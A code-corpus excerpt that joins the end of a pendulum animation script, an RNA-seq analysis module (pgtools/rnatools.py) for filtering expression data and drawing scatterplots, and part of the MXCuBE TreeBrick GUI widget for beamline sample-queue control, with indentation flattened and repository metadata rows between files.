plotsys=[(0,'$x$'),(1,'$\\dot{x}$')], plotinputs=[(0,'$u$')])
xmin = np.min(S.sim_data[1][:,0])
xmax = np.max(S.sim_data[1][:,0])
A.set_limits(xlim=(xmin - 1.0, xmax + 1.0), ylim=(-1.2,1.2))
if 'plot' in sys.argv:
A.show(t=S.b)
if 'animate' in sys.argv:
A.animate()
A.save('ex8_ConstrainedDoublePendulum.gif')
|
bsd-3-clause
| -5,700,278,940,750,666,000
| 30.660584
| 102
| 0.566686
| false
| 3.080611
| false
| false
| false
|
phageghost/pg_tools
|
pgtools/rnatools.py
|
1
|
13893
|
import os
import itertools
import numpy
import scipy
import pandas
import seaborn
import matplotlib.pyplot as plt
from pgtools import toolbox
PSEUDO_COUNT = 1
EXPRESSION_THRESHOLD = 1
FIG_EXTS = ['pdf', 'png']
PNG_DPI = 600
def load_and_clean(datafile):
exp_data = pandas.read_csv(datafile, sep='\t', index_col=0).T
exp_data.index.name = 'Sample'
# trim sample names
new_index = []
for i in range(exp_data.shape[0]):
index_item = exp_data.index[i]
if i >= 7:
if index_item.find(' reads') > -1:
index_item = index_item[:index_item.find(' reads')]
if index_item.find('/') > -1:
index_item = index_item.split('/')[-1]
new_index.append(index_item)
exp_data.index = new_index
exp_data.columns.name='Entrez mRNA ID'
return exp_data
def trim_rna_file(input_filename, output_filename='', fix_names=True, transcript_to_gene=False, sep='\t'):
"""
Given the filename of a HOMER-output RNA-seq DataFrame, generate a
new file containing a new dataframe with the gene info columns (0-6)
removed. <output_filename> defaults to input_filename with "_trimmed"
appended to the filename mantissa.
If :param:`transcript_to_gene` is True, replace the refseq Transcript ID with the gene name from the annotation
"""
path, prefix, suffix = toolbox.parse_path(input_filename)
toolbox.establish_path(path)
rna_data = pandas.read_csv(input_filename, sep=sep, index_col=0)
if transcript_to_gene:
gene_names = [anno.split('|')[0] for anno in rna_data.iloc[:,6]]
rna_data.index = gene_names
rna_data = rna_data.iloc[:,7:]
# print(rna_data.columns)
if fix_names:
rna_data.columns = [col.replace('-','_').replace('.','_') for col in rna_data.columns]
# print(rna_data.columns)
rna_data.columns = [col.strip('/').split('/')[-1].strip() for col in rna_data.columns]
# print(rna_data.columns)
rna_data.columns = [(col, col.split(' FPKM')[0])[' FPKM' in col] for col in rna_data.columns]
# print(rna_data.columns)
rna_data.columns = [(col, col.split(' TPM')[0])[' TPM' in col] for col in rna_data.columns]
# print(rna_data.columns)
rna_data.columns = [(col, col.split(' (')[0])[' total)' in col] for col in rna_data.columns]
# print(rna_data.columns)
if not output_filename:
output_filename = os.path.join(path, '{}{}{}.{}'.format(prefix, '_trimmed', ('', '_gene_name')[transcript_to_gene], suffix))
rna_data.to_csv(output_filename, sep='\t')
def convert_rpkm_to_tpm(rpkm_data):
"""
Given a trimmed DataFrame of RNA-seq data in RPKM (with genes on rows
and samples on columns), return a new dataframe the the RPKM values
converted to transcripts per million (TPM)
"""
return rpkm_data / rpkm_data.sum(axis=0) * 1e6
def filter_by_type(raw_data, length_threshold=200):
"""
Retain only protein-coding transcripts and ncRNA transcripts with length >= length_threshold (lncRNA)
"""
filtered_data = raw_data.loc[:, [raw_data.loc['Annotation/Divergence'][i].split('|')[-1] == 'protein-coding'
or (raw_data.loc['Annotation/Divergence'][i].split('|')[-1] == 'ncRNA'
and raw_data.loc['Length'][i] >= length_threshold) for i in range(raw_data.shape[1])]]
print('Initial transcripts: {}'.format(raw_data.shape[1]))
print('Retaining only protein-coding and ncRNA transcripts with length >= {}'.format(length_threshold))
print('\tRemoved {} transcripts'.format(raw_data.shape[1] - filtered_data.shape[1]))
print('{} transcripts remaining'.format(filtered_data.shape[1]))
return filtered_data
def filter_by_expression_magnitude(raw_data, magnitude_threshold=1):
"""
Remove any transcripts not expressed at at least <magnitude_threshold> in one or more samples.
"""
data_rows = raw_data.index[:]
print('Initial transcripts: {}'.format(raw_data.shape[1]))
filtered_data = raw_data.loc[:,(raw_data.loc[data_rows] >= magnitude_threshold).any(axis=0)]
print('Removed {} transcripts with magnitude < {} across all samples'.format(raw_data.shape[1] - filtered_data.shape[1], magnitude_threshold))
print('{} transcripts remaining'.format(filtered_data.shape[1]))
return filtered_data
def correlated_columns(df):
"""
Since the Pandas DataFrame.corr() method has stopped working, I create my own
"""
sample_corrs = pandas.DataFrame(numpy.zeros((df.shape[1], df.shape[1])), index=df.columns, columns=df.columns)
for col1, col2 in itertools.combinations(df.columns, 2):
pcc = scipy.stats.pearsonr(df[col1], df[col2])[0]
sample_corrs.loc[col1, col2] = pcc
sample_corrs.loc[col2, col1] = pcc
for col in df.columns:
sample_corrs.loc[col, col] = 1.0
return sample_corrs
def scatter_rna(rna_df, dataset1, dataset2, name1='', name2='', transform=None, stat_func=None, stat_func_name='', magnitude_threshold=0, threshold_type='',
cmap='', color='r', plot_size=4, marker_size=10, marker='o', units='Log_2 TPM', density_gamma=1, output_fname_prefix='',
lims=None, ticks=None, visible_ticks=True,
coloring_sets=None,
annotations=None, annotation_padding=0.2, annotation_color='k', annotation_font_size=8,
annotation_linewidth=1, show_diagonal=False, diagonal_kwargs={}, fig=None, ax=None):
"""
Generates a scatterplot of expression values between matched sequences of expression data :dataset1: and :dataset2:
:name1: label for dataset1
:name2: label for dataset2
:transform: (optional) a function to apply to every value in each dataset prior to plotting.
:stat_func: (optional) a summary statistical function which will be passed both datasets.
:stat_func_name: (optional) the name of the resulting statistic
:magnitude_threshold: (optional) only plot data above this threshold (after transformation, if any)
:threshold_type: (optional) can be 'and' or 'or'. For 'and', exclude any points which are not above the threshold in _both_ datasets.
For 'or' exclude any points below the threshold in _either_ dataset.
:cmap: (optional) the name of a built-in matplotlib colormap to use for a density-based coloring of points. If empty, just use a plain color
:color: (optional) if :cmap: is not specified, use this single color to render the points. Defaults to red.
:plot_size: (optional) the size of each figure dimension, in inches.
:marker_size: (optional) the size of each point marker, in points. Defaults to 10.
:marker: (optional) any valid matplotlib marker style to use for the point markers. Defaults to 'o' (filled circle).
:units: (optional) the name of the resulting units of expression that will be appended to each dataset name to label the axes. Defaults to 'Log_2 TPM'
:density_gamma: (optional) the density color mapping will be raised to this power. So numbers less than 1 reduce contrast and move values to the denser
end, and values greater than 1 increase contrast and move values to the sparser end.
:output_fname_prefix: (optional). If present, save a PNG and PDF having this prefix.
:lims: (optional): force the axes to have the specified range. If not specified, use the larger of the automatically-determined axis sizes.
:ticks: (optional): a sequence of locations to place ticks on both axes.
:coloring_sets: an iterable of tuples. Each tuple should consist of a color code paired with a list of genes to which the color should be applied. Not compatible with :cmap:.
:annotated_genes: an iterable of tuples containing (gene_name, x_offset, y_offset) where x and y offsetts give the coordinate shifts for the label relative to the gene location
:show_diagonal: Whether or not to draw a line across the diagonal. Default False.
:diagonal_kwargs: Keyword arguments to pass to the plot function that draws the diagonal.
:fig: (optional) matplotlib Figure object to use.
:ax: (optional) matplotlib Axes object to use.
"""
if (fig or ax) and (not fig and ax):
raise ValueError('If passing a fig or ax object, must pass both!')
if not (fig and ax):
seaborn.set_style('white')
fig, ax = plt.subplots(1, figsize=(plot_size,plot_size))
x_data = rna_df.loc[:,dataset1]
y_data = rna_df.loc[:,dataset2]
if not name1:
name1 = dataset1
if not name2:
name2 = dataset2
if transform:
x_data = transform(x_data)
y_data = transform(y_data)
if threshold_type == 'or':
# keep only genes with > threshold expression in at least one dataset
print('Keeping only transcripts with >= {} expression in at least one dataset'.format(magnitude_threshold))
kept_genes = set(x_data[x_data >= magnitude_threshold].index).union(set(y_data[y_data >= magnitude_threshold].index))
elif threshold_type == 'and':
print('Keeping only transcripts with >= {} expression in both datasets'.format(magnitude_threshold))
# keep only genes with > threshold expression in at least one dataset
kept_genes = set(x_data[x_data >= magnitude_threshold].index).intersection(set(y_data[y_data >= magnitude_threshold].index))
elif threshold_type == '':
kept_genes = rna_df.index
else:
raise ValueError('Unknown threshold type: {}'.format(threshold_type))
x_data = x_data.loc[kept_genes]
y_data = y_data.loc[kept_genes]
print('Kept {} transcripts, discarded {}.'.format(len(kept_genes), rna_df.shape[0] - len(kept_genes)))
if stat_func:
stat_result = stat_func(x_data, y_data)
if cmap:
xy = numpy.vstack([x_data,y_data])
z = scipy.stats.gaussian_kde(xy)(xy)**density_gamma
idx = z.argsort()
x_data, y_data, z = x_data[idx], y_data[idx], z[idx]
ax.scatter(x=x_data,
y=y_data,
marker=marker, cmap=cmap, c=z, s=marker_size, edgecolor='')
else:
if coloring_sets:
remaining_genes = set(kept_genes)
for set_color, set_genes in coloring_sets:
remaining_genes = remaining_genes.difference(set_genes)
# plot the remaining genes
ax.scatter(x=x_data.loc[remaining_genes],
y=y_data.loc[remaining_genes],
marker=marker, c=color, s=marker_size, edgecolor='')
for set_color, set_genes in coloring_sets:
ax.scatter(x=x_data.loc[set_genes],
y=y_data.loc[set_genes],
marker=marker, c=set_color, s=marker_size, edgecolor='')
else:
ax.scatter(x=x_data,
y=y_data,
marker=marker, c=color, s=marker_size, edgecolor='')
if annotations:
for gene_name, x_offset, y_offset in annotations:
if gene_name in x_data.index and gene_name in y_data.index:
gene_x = x_data[gene_name]
gene_y = y_data[gene_name]
# Compute padding components using Pythogorean theorem
pointer_length = numpy.sqrt(x_offset**2 + (y_offset)**2)
if pointer_length > annotation_padding * 2:
correction_factor = annotation_padding / pointer_length
padding_x = x_offset * correction_factor
padding_y = y_offset * correction_factor
else:
padding_x = 0
padding_y = 0
text_x = gene_x + x_offset
text_y = gene_y + y_offset
ax.text(x=text_x, y=text_y, s=gene_name, fontsize=annotation_font_size)
ax.plot((gene_x+padding_x, text_x - padding_x), (gene_y + padding_y, text_y-padding_y),
color=annotation_color, linewidth=annotation_linewidth)
ax.set_xlabel('{} {}'.format(name1, units))
ax.set_ylabel('{} {}'.format(name2, units))
# make axes square
if not lims:
biggest_lim = max(ax.get_ylim()[1], ax.get_xlim()[1])
lims = (0, biggest_lim)
ax.set_xlim(*lims)
ax.set_ylim(*lims)
if ticks:
ax.set_xticks(ticks)
ax.set_yticks(ticks)
plt.setp(ax.get_xticklabels(), visible=visible_ticks)
plt.setp(ax.get_yticklabels(), visible=visible_ticks)
if show_diagonal:
ax.plot(*lims, **diagonal_kwargs)
if stat_func:
print('{} vs {}, {}: {:>.3}'.format(name1, name2, stat_func_name, stat_func(x_data, y_data)))
ax.text(x=(ax.get_xlim()[1] - ax.get_xlim()[0]) * 0.1 + ax.get_xlim()[0],
y=(ax.get_ylim()[1] - ax.get_ylim()[0]) * 0.9 + ax.get_ylim()[0],
s='{}: {:>.3}'.format(stat_func_name, stat_result))
if output_fname_prefix:
# toolbox.establish_path(toolbox.parse_path(output_fname_prefix)[0])
# Save plot
for fig_ext in FIG_EXTS:
figure_fname = '{}.{}'.format(output_fname_prefix, fig_ext)
print('Saving figure to {} ...'.format(figure_fname))
fig.savefig(figure_fname, bbox_inches='tight', dpi=PNG_DPI)
# Save data as CSV file
data_fname = '{}_data.csv'.format(output_fname_prefix)
print('Saving raw data to {}'.format(data_fname))
pandas.DataFrame({'{} ({})'.format(name1, units):x_data, '{} ({})'.format(name2, units):y_data}, index=x_data.index).to_csv(data_fname, index=False)
|
mit
| 1,190,259,456,043,873,800
| 45.620805
| 180
| 0.618081
| false
| 3.602956
| false
| false
| false
|
IvarsKarpics/mxcube
|
gui/bricks/TreeBrick.py
|
1
|
53816
|
# Project: MXCuBE
# https://github.com/mxcube
#
# This file is part of MXCuBE software.
#
# MXCuBE is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# MXCuBE is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with MXCuBE. If not, see <http://www.gnu.org/licenses/>.
# import os
import logging
# from collections import namedtuple
from gui.BaseComponents import BaseWidget
from gui.utils import queue_item, Colors, QtImport
from gui.utils.sample_changer_helper import SC_STATE_COLOR, SampleChanger
from gui.widgets.dc_tree_widget import DataCollectTree
from HardwareRepository.HardwareObjects.queue_model_enumerables import CENTRING_METHOD
from HardwareRepository import HardwareRepository as HWR
__credits__ = ["MXCuBE collaboration"]
__license__ = "LGPLv3+"
__category__ = "General"
class TreeBrick(BaseWidget):
enable_widgets = QtImport.pyqtSignal(bool)
hide_sample_tab = QtImport.pyqtSignal(bool)
hide_dc_parameters_tab = QtImport.pyqtSignal(bool)
hide_sample_centring_tab = QtImport.pyqtSignal(bool)
hide_dcg_tab = QtImport.pyqtSignal(bool)
hide_sample_changer_tab = QtImport.pyqtSignal(bool)
hide_plate_manipulator_tab = QtImport.pyqtSignal(bool)
hide_char_parameters_tab = QtImport.pyqtSignal(bool)
hide_energy_scan_tab = QtImport.pyqtSignal(bool)
hide_xrf_spectrum_tab = QtImport.pyqtSignal(bool)
hide_workflow_tab = QtImport.pyqtSignal(bool)
hide_advanced_tab = QtImport.pyqtSignal(bool)
hide_xray_imaging_tab = QtImport.pyqtSignal(bool)
populate_dc_parameter_widget = QtImport.pyqtSignal(object)
populate_dc_group_widget = QtImport.pyqtSignal(object)
populate_char_parameter_widget = QtImport.pyqtSignal(object)
populate_sample_details = QtImport.pyqtSignal(object)
populate_energy_scan_widget = QtImport.pyqtSignal(object)
populate_xrf_spectrum_widget = QtImport.pyqtSignal(object)
populate_advanced_widget = QtImport.pyqtSignal(object)
populate_xray_imaging_widget = QtImport.pyqtSignal(object)
populate_workflow_widget = QtImport.pyqtSignal(object)
selection_changed = QtImport.pyqtSignal(object)
set_directory = QtImport.pyqtSignal(str)
set_prefix = QtImport.pyqtSignal(str)
set_sample = QtImport.pyqtSignal(object)
get_tree_brick = QtImport.pyqtSignal(BaseWidget)
diffractometer_ready = QtImport.pyqtSignal(bool)
sample_mount_started = QtImport.pyqtSignal()
sample_mount_finished = QtImport.pyqtSignal()
def __init__(self, *args):
BaseWidget.__init__(self, *args)
# Hardware objects ----------------------------------------------------
self.state_machine_hwobj = None
self.redis_client_hwobj = None
# Internal variables --------------------------------------------------
self.enable_collect_conditions = {}
self.current_view = None
self.current_queue_entry = None
self.is_logged_in = False
self.lims_samples = None
self.filtered_lims_samples = None
self.compression_state = True
self.queue_autosave_action = None
self.queue_undo_action = None
self.queue_redo_action = None
self.queue_sync_action = None
# Properties ----------------------------------------------------------
self.add_property("queue", "string", "/queue")
self.add_property("queue_model", "string", "/queue-model")
self.add_property("xml_rpc_server", "string", "/xml_rpc_server")
self.add_property("redis_client", "string", "")
self.add_property("useFilterWidget", "boolean", True)
self.add_property("useSampleWidget", "boolean", True)
self.add_property("scOneName", "string", "Sample changer")
self.add_property("scTwoName", "string", "Plate")
self.add_property("usePlateNavigator", "boolean", False)
self.add_property("useHistoryView", "boolean", True)
self.add_property("useCentringMethods", "boolean", True)
self.add_property("enableQueueAutoSave", "boolean", True)
# Properties to initialize hardware objects --------------------------
self.add_property("hwobj_state_machine", "string", "")
# Signals ------------------------------------------------------------
self.define_signal("enable_widgets", ())
self.define_signal("diffractometer_ready", ())
# Hiding and showing the tabs
self.define_signal("hide_sample_tab", ())
self.define_signal("hide_dc_parameters_tab", ())
self.define_signal("hide_sample_centring_tab", ())
self.define_signal("hide_dcg_tab", ())
self.define_signal("hide_sample_changer_tab", ())
self.define_signal("hide_plate_manipulator_tab", ())
self.define_signal("hide_char_parameters_tab", ())
self.define_signal("hide_energy_scan_tab", ())
self.define_signal("hide_xrf_spectrum_tab", ())
self.define_signal("hide_workflow_tab", ())
self.define_signal("hide_advanced_tab", ())
self.define_signal("hide_xray_imaging_tab", ())
self.define_signal("populate_dc_parameter_widget", ())
self.define_signal("populate_dc_group_widget", ())
self.define_signal("populate_char_parameter_widget", ())
self.define_signal("populate_sample_details", ())
self.define_signal("populate_energy_scan_widget", ())
self.define_signal("populate_xrf_spectrum_widget", ())
self.define_signal("populate_workflow_tab", ())
self.define_signal("populate_advanced_widget", ())
self.define_signal("populate_xray_imaging_widget", ())
self.define_signal("selection_changed", ())
self.define_signal("set_directory", ())
self.define_signal("set_prefix", ())
self.define_signal("set_sample", ())
self.define_signal("get_tree_brick", ())
self.define_signal("sample_mount_started", ())
self.define_signal("sample_mount_finished", ())
# Slots ---------------------------------------------------------------
self.define_slot("logged_in", ())
self.define_slot("status_msg_changed", ())
self.define_slot("sample_load_state_changed", ())
self.define_slot("set_session", ())
self.define_slot("get_selected_samples", ())
self.define_slot("set_requested_tree_brick", ())
# Graphic elements ----------------------------------------------------
self.tools_menu = None
self.queue_sync_action = None
self.sample_changer_widget = QtImport.load_ui_file(
"sample_changer_widget_layout.ui"
)
# self.refresh_pixmap = Icons.load("Refresh2.png")
# self.sample_changer_widget.synch_button.setIcon(QtGui.QIcon(self.refresh_pixmap))
# self.sample_changer_widget.synch_button.setText("Synch ISPyB")
self.dc_tree_widget = DataCollectTree(self)
self.dc_tree_widget.selection_changed_cb = self.selection_changed_cb
self.dc_tree_widget.run_cb = self.run
# self.dc_tree_widget.clear_centred_positions_cb = \
# self.clear_centred_positions
# Layout --------------------------------------------------------------
__main_layout = QtImport.QVBoxLayout(self)
__main_layout.addWidget(self.sample_changer_widget)
__main_layout.addWidget(self.dc_tree_widget)
__main_layout.setSpacing(0)
__main_layout.setContentsMargins(0, 0, 0, 0)
# SizePolicies --------------------------------------------------------
# Qt signal/slot connections ------------------------------------------
self.sample_changer_widget.details_button.clicked.connect(
self.toggle_sample_changer_tab
)
self.sample_changer_widget.filter_cbox.activated.connect(
self.mount_mode_combo_changed
)
self.sample_changer_widget.centring_cbox.activated.connect(
self.dc_tree_widget.set_centring_method
)
self.sample_changer_widget.synch_ispyb_button.clicked.connect(
self.refresh_sample_list
)
# self.sample_changer_widget.tree_options_button.clicked.connect(\
# self.open_tree_options_dialog)
self.sample_changer_widget.filter_combo.activated.connect(
self.filter_combo_changed
)
self.sample_changer_widget.filter_ledit.textChanged.connect(
self.filter_text_changed
)
self.sample_changer_widget.sample_combo.activated.connect(
self.sample_combo_changed
)
# Other ---------------------------------------------------------------
self.enable_collect(True)
self.sample_changer_widget.synch_ispyb_button.setEnabled(False)
#self.setSizePolicy(QtImport.QSizePolicy.Maximum, QtImport.QSizePolicy.Expanding)
if HWR.beamline.sample_changer is not None:
self.connect(
HWR.beamline.sample_changer,
SampleChanger.STATE_CHANGED_EVENT,
self.sample_load_state_changed,
)
self.connect(
HWR.beamline.sample_changer,
SampleChanger.SELECTION_CHANGED_EVENT,
self.sample_selection_changed,
)
self.connect(
HWR.beamline.sample_changer,
SampleChanger.INFO_CHANGED_EVENT,
self.set_sample_pin_icon,
)
self.connect(
HWR.beamline.sample_changer,
SampleChanger.STATUS_CHANGED_EVENT,
self.sample_changer_status_changed,
)
else:
logging.getLogger("HWR").debug(
"TreeBrick: Sample changer not available."
)
if HWR.beamline.plate_manipulator is not None:
self.connect(
HWR.beamline.plate_manipulator,
SampleChanger.STATE_CHANGED_EVENT,
self.sample_load_state_changed,
)
self.connect(
HWR.beamline.plate_manipulator,
SampleChanger.INFO_CHANGED_EVENT,
self.plate_info_changed,
)
else:
logging.getLogger("GUI").debug(
"TreeBrick: plate manipulator hwobj not defined."
)
self.connect(
HWR.beamline.sample_view, "shapeCreated", self.dc_tree_widget.shape_created
)
self.connect(
HWR.beamline.sample_view,
"shapeChanged",
self.dc_tree_widget.shape_changed
)
self.connect(
HWR.beamline.sample_view, "shapeDeleted", self.dc_tree_widget.shape_deleted
)
self.connect(
HWR.beamline.sample_view,
"diffractometerReady",
self.diffractometer_ready_changed
)
self.connect(
HWR.beamline.diffractometer,
"newAutomaticCentringPoint",
self.diffractometer_automatic_centring_done,
)
self.connect(
HWR.beamline.diffractometer,
"minidiffPhaseChanged",
self.diffractometer_phase_changed,
)
self.diffractometer_phase_changed(
HWR.beamline.diffractometer.get_current_phase()
)
self.connect(
HWR.beamline.queue_manager,
"show_workflow_tab",
self.show_workflow_tab_from_model
)
self.connect(
HWR.beamline.queue_manager,
"queue_entry_execute_started",
self.queue_entry_execution_started,
)
self.connect(
HWR.beamline.queue_manager,
"queue_entry_execute_finished",
self.queue_entry_execution_finished,
)
self.connect(HWR.beamline.queue_manager, "queue_paused", self.queue_paused_handler)
self.connect(
HWR.beamline.queue_manager, "queue_execution_finished", self.queue_execution_finished
)
self.connect(HWR.beamline.queue_manager, "queue_stopped", self.queue_stop_handler)
self.connect(HWR.beamline.queue_model, "child_added", self.dc_tree_widget.add_to_view)
if hasattr(HWR.beamline, "ppu_control"):
self.connect(
HWR.beamline.ppu_control,
"ppuStatusChanged",
self.ppu_status_changed,
)
if HWR.beamline.safety_shutter is not None:
self.connect(
HWR.beamline.safety_shutter, "shutterStateChanged", self.shutter_state_changed
)
if HWR.beamline.machine_info is not None:
self.connect(
HWR.beamline.machine_info, "machineCurrentChanged", self.machine_current_changed
)
has_shutter_less = HWR.beamline.detector.has_shutterless()
if has_shutter_less:
self.dc_tree_widget.confirm_dialog.disable_dark_current_cbx()
def run(self):
"""Adds save, load and auto save menus to the menubar
Emits signals to close tabs"""
self.tools_menu = QtImport.QMenu("Queue", self)
self.tools_menu.addAction("Save", self.save_queue)
self.tools_menu.addAction("Load", self.load_queue)
self.queue_autosave_action = self.tools_menu.addAction(
"Auto save", self.queue_autosave_clicked
)
self.queue_autosave_action.setCheckable(True)
self.queue_autosave_action.setChecked(self["enableQueueAutoSave"])
self.queue_autosave_action.setEnabled(self["enableQueueAutoSave"])
self.tools_menu.addSeparator()
self.queue_undo_action = self.tools_menu.addAction(
"Undo last action", self.queue_undo_clicked
)
self.queue_undo_action.setEnabled(False)
self.queue_redo_action = self.tools_menu.addAction(
"Redo last action", self.queue_redo_clicked
)
self.queue_redo_action.setEnabled(False)
self.tools_menu.addSeparator()
self.queue_sync_action = self.tools_menu.addAction(
"Sync with ISPyB", self.queue_sync_clicked
)
self.queue_sync_action.setEnabled(False)
if BaseWidget._menubar is not None:
BaseWidget._menubar.insert_menu(self.tools_menu, 1)
self.hide_dc_parameters_tab.emit(True)
self.hide_dcg_tab.emit(True)
self.hide_sample_centring_tab.emit(False)
self.hide_char_parameters_tab.emit(True)
self.hide_sample_changer_tab.emit(True)
self.hide_plate_manipulator_tab.emit(True)
self.hide_sample_tab.emit(True)
self.hide_energy_scan_tab.emit(True)
self.hide_xrf_spectrum_tab.emit(True)
self.hide_workflow_tab.emit(True)
self.hide_advanced_tab.emit(True)
def property_changed(self, property_name, old_value, new_value):
if property_name == "useFilterWidget":
self.sample_changer_widget.filter_label.setVisible(new_value)
self.sample_changer_widget.filter_ledit.setVisible(new_value)
self.sample_changer_widget.filter_combo.setVisible(new_value)
elif property_name == "useSampleWidget":
self.sample_changer_widget.sample_label.setVisible(new_value)
self.sample_changer_widget.sample_combo.setVisible(new_value)
elif property_name == "useCentringMethods":
self.sample_changer_widget.centring_cbox.setEnabled(new_value)
self.sample_changer_widget.centring_mode_label.setEnabled(new_value)
elif property_name == "xml_rpc_server":
xml_rpc_server_hwobj = self.get_hardware_object(new_value)
if xml_rpc_server_hwobj:
self.connect(xml_rpc_server_hwobj, "add_to_queue", self.add_to_queue)
self.connect(
xml_rpc_server_hwobj,
"start_queue",
self.dc_tree_widget.collect_items,
)
self.connect(
xml_rpc_server_hwobj, "open_dialog", self.open_xmlrpc_dialog
)
elif property_name == "hwobj_state_machine":
self.state_machine_hwobj = self.get_hardware_object(
new_value, optional=True
)
elif property_name == "redis_client":
self.redis_client_hwobj = self.get_hardware_object(new_value, optional=True)
elif property_name == "scOneName":
self.sample_changer_widget.filter_cbox.setItemText(1, new_value)
elif property_name == "scTwoName":
self.sample_changer_widget.filter_cbox.setItemText(2, new_value)
elif property_name == "usePlateNavigator":
self.dc_tree_widget.plate_navigator_cbox.setVisible(new_value)
elif property_name == "useHistoryView":
# self.dc_tree_widget.history_tree_widget.setVisible(new_value)
self.dc_tree_widget.history_enable_cbox.setVisible(new_value)
else:
BaseWidget.property_changed(self, property_name, old_value, new_value)
@QtImport.pyqtSlot(int, str, str, int, str, str, bool)
def set_session(
self,
session_id,
t_prop_code=None,
prop_number=None,
prop_id=None,
start_date=None,
prop_code=None,
is_inhouse=None,
):
HWR.beamline.session.set_session_start_date(str(start_date))
@QtImport.pyqtSlot()
def set_requested_tree_brick(self):
self.get_tree_brick.emit(self)
@QtImport.pyqtSlot(bool)
def logged_in(self, logged_in):
"""
Connected to the signal loggedIn of ProposalBrick2.
The signal is emitted when a user was succesfully logged in.
At first free-pin mode is created
Then it tries to initialize two sample changers and create
two associated queue models.
"""
self.is_logged_in = logged_in
# self.enable_collect(logged_in)
# if not logged_in:
if True:
self.dc_tree_widget.sample_mount_method = 0
self.dc_tree_widget.populate_free_pin()
self.dc_tree_widget.plate_navigator_cbox.setVisible(False)
if (
HWR.beamline.sample_changer is not None
and HWR.beamline.diffractometer.use_sample_changer()
):
sc_basket_content, sc_sample_content = self.get_sc_content()
if sc_basket_content and sc_sample_content:
sc_basket_list, sc_sample_list = self.dc_tree_widget.samples_from_sc_content(
sc_basket_content, sc_sample_content
)
self.dc_tree_widget.sample_mount_method = 1
self.dc_tree_widget.populate_tree_widget(
sc_basket_list,
sc_sample_list,
self.dc_tree_widget.sample_mount_method,
)
self.sample_changer_widget.details_button.setText("Show SC-details")
if (
HWR.beamline.plate_manipulator is not None
and HWR.beamline.diffractometer.in_plate_mode()
):
if self["usePlateNavigator"]:
self.dc_tree_widget.plate_navigator_cbox.setVisible(True)
plate_row_content, plate_sample_content = self.get_plate_content()
if plate_sample_content:
plate_row_list, plate_sample_list = self.dc_tree_widget.samples_from_sc_content(
plate_row_content, plate_sample_content
)
self.dc_tree_widget.sample_mount_method = 2
self.dc_tree_widget.populate_tree_widget(
plate_row_list,
plate_sample_list,
self.dc_tree_widget.sample_mount_method,
)
self.sample_changer_widget.details_button.setText(
"Show Plate-details"
)
self.sample_changer_widget.filter_cbox.setCurrentIndex(
self.dc_tree_widget.sample_mount_method
)
self.dc_tree_widget.filter_sample_list(
self.dc_tree_widget.sample_mount_method
)
if self.dc_tree_widget.sample_mount_method > 0:
# Enable buttons related to sample changer
self.sample_changer_widget.filter_cbox.setEnabled(True)
self.sample_changer_widget.details_button.setEnabled(True)
self.dc_tree_widget.scroll_to_item()
if self.dc_tree_widget.sample_mount_method < 2 and logged_in:
self.sample_changer_widget.synch_ispyb_button.setEnabled(True)
if self.redis_client_hwobj is not None:
self.redis_client_hwobj.load_graphics()
self.load_queue()
self.dc_tree_widget.samples_initialized = True
# if not self.dc_tree_widget.samples_initialized
# self.dc_tree_widget.sample_tree_widget_selection()
# self.dc_tree_widget.set_sample_pin_icon()
# self.dc_tree_widget.scroll_to_item()
self.dc_tree_widget.update_basket_selection()
def enable_collect(self, state):
"""
Enables the collect controls.
:param state: Enable if state is True and disable if False
:type state: bool
:returns: None
"""
self.dc_tree_widget.enable_collect(state)
def queue_entry_execution_started(self, queue_entry):
self.current_queue_entry = queue_entry
self.enable_widgets.emit(False)
self.dc_tree_widget.queue_entry_execution_started(queue_entry)
# BaseWidget.set_status_info("status", "Queue started", "running")
def queue_entry_execution_finished(self, queue_entry, status):
self.current_queue_entry = None
self.dc_tree_widget.queue_entry_execution_finished(queue_entry, status)
self.enable_widgets.emit(True)
if queue_entry.get_type_str() not in ["Sample", "Basket", ""]:
BaseWidget.set_status_info(
"collect", "%s : %s" % (queue_entry.get_type_str(), status)
)
def queue_paused_handler(self, status):
self.enable_widgets.emit(True)
self.dc_tree_widget.queue_paused_handler(status)
def queue_execution_finished(self, status):
# self.enable_widgets.emit(True)
self.current_queue_entry = None
self.dc_tree_widget.queue_execution_completed(status)
def queue_stop_handler(self, status):
self.enable_widgets.emit(True)
self.dc_tree_widget.queue_stop_handler(status)
# BaseWidget.set_status_info("status", "Queue stoped")
def diffractometer_ready_changed(self, status):
self.diffractometer_ready.emit(HWR.beamline.diffractometer.is_ready())
try:
info_message = HWR.beamline.diffractometer.get_status()
except AttributeError:
info_message = None
if info_message is None and status:
info_message = "Ready"
info_status = "ready"
elif info_message is None:
info_message = "Not ready"
info_status = "running"
else:
info_status = "ready"
BaseWidget.set_status_info("diffractometer", info_message, info_status)
def diffractometer_automatic_centring_done(self, point):
if self.dc_tree_widget.centring_method == CENTRING_METHOD.LOOP:
message_box = QtImport.QMessageBox()
message_box.setIcon(QtImport.QMessageBox.Question)
message_box.setWindowTitle("Optical centring with user confirmation.")
message_box.setText("Optical centring done. How to proceed?")
message_box.addButton("Accept result", QtImport.QMessageBox.ApplyRole)
message_box.addButton("Try again", QtImport.QMessageBox.RejectRole)
if self.current_queue_entry:
message_box.addButton(
"Skip following entry", QtImport.QMessageBox.NoRole
)
result = message_box.exec_()
if result == QtImport.QMessageBox.AcceptRole:
HWR.beamline.diffractometer.automatic_centring_try_count = 0
elif result == QtImport.QMessageBox.RejectRole:
logging.getLogger("GUI").info(
"Optical centring result rejected. " + "Trying once again."
)
else:
HWR.beamline.diffractometer.automatic_centring_try_count = 0
if self.current_queue_entry:
logging.getLogger("GUI").info(
"Optical centring rejected "
+ "and the following queue entries skipped"
)
task_group_entry = self.current_queue_entry.get_container()
for child_entry in task_group_entry.get_queue_entry_list():
child_entry.set_enabled(False)
def samples_from_lims(self, samples):
barcode_samples, location_samples = self.dc_tree_widget.samples_from_lims(
samples
)
l_samples = dict()
# TODO: add test for sample changer type, here code is for Robodiff only
for location, l_sample in location_samples.items():
if l_sample.lims_location != (None, None):
basket, sample = l_sample.lims_location
cell = int(round((basket + 0.5) / 3.0))
puck = basket - 3 * (cell - 1)
new_location = (cell, puck, sample)
l_sample.lims_location = new_location
l_samples[new_location] = l_sample
